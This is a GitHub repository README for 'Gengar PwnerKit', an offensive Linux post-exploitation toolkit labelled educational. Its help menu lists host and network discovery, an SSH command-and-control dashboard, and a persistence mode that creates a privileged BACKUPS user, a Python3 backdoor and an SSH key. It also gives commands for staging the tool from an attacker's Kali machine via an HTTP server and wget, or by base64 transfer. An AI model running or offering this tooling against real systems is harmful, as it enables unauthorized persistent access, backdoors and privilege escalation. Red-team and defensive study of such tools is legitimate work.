Skip to content

h0ru/gpk

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

89 Commits
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Gengar PwnerKit

Persistence TA0003 | Privilege Escalation TA0004 | Discovery TA0007

                  image


About Gengar PwnerKit

[+] Educational purposes

[+] Rewritten and more objective code

[+] New Features

[+] Better usability


How to Install?

wget -q https://raw.githubusercontent.com/h0ru/gpk/main/source/gpk -O gpk ; chmod +x gpk

Help Menu

 [*] HELP MENU

     [+] -h --help  -   HELP MENU (Show these help)
     [+] -m         -   MACHINE INFORMATIONS (Show Hardware/System Infos)
     [+] -ds        -   DEEP SEARCH (Show Tools, Crontab Files, SUID Binaries, Writable Folders)
     [+] -n         -   NETWORK (Show Network Information and use Ping Sweep and Port Scan modes)
     [+] -c2        -   CHACAL C2 (Manage SSH Connections Through a Dashboard)
     [+] -p         -   PERSISTENCE (Create a Privileged User Called BACKUPS, Create a Backdoor in Python3 and an SSH KEY)

Check out some images


Sending to The Target

Local Network

(KALI)
python3 -m http.server 80

(TARGET)
wget ip/gpk -O gpk ; chmod +x gpk

Via BASE64

(KALI)
cat gpk | base64 -w0

(TARGET)
nano gpk.b64 (paste the base64 gpk code)

base64 -d gpk.b64 > gpk ; chmod +x gpk